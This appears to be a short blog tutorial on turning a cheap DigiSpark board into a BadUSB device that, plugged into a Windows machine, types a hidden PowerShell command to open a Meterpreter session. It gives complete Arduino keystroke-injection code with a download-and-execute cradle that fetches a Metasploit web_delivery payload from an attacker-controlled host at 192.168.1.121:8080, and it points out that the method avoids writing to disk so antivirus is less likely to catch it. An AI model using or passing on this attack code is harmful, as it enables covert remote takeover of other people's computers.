This exploit is similar to that of USB Rubber Ducky, USBDriveBy, and BadUSB, except uses a small, cheap $7 DigiSpark. Insert the DigiSpark in a target machine, wait 15 seconds, remove, and you have a Meterpreter session opened. It simply acts as a keyboard, opens a command prompt, enters a Powershell command, and disappears. This is for Windows but can potentially be used in Linux/OSX via Python or PHP rather than PowerShell (PSH). Using a Powershell command through Web Delivery doesn’t write to disk and avoids executing a .exe payload.
Web Delivery Description
This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
For more information:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery
DigiStump DigiSpark page:
http://digistump.com/products/1
DigiSpark is programmed using Arduino IDE 1.6+. See link on the simple setup process.
http://digistump.com/wiki/digispark/tutorials/connecting
Here is the simple Arduino code. Note Line 18 will be your specific payload command when you run the exploit in Metasploit. Also note this will loop, so remove the DigiSpark when it completes. On some Windows machines it didn’t run anything on the first iteration, but completed everything on the second. Others it works almost instantly. The DigiSpark has a 5 second programming delay to check for a pending write.
#include "DigiKeyboard.h"
void setup() {
// don't need to set anything up to use DigiKeyboard
}
void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.println("cmd");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(2000);
DigiKeyboard.println("powershell.exe -nop -w hidden -c $c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $c.downloadstring('http://192.168.1.121:8080/exploit');");
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(5000);
}
See following video for a demonstration:
iLL logic 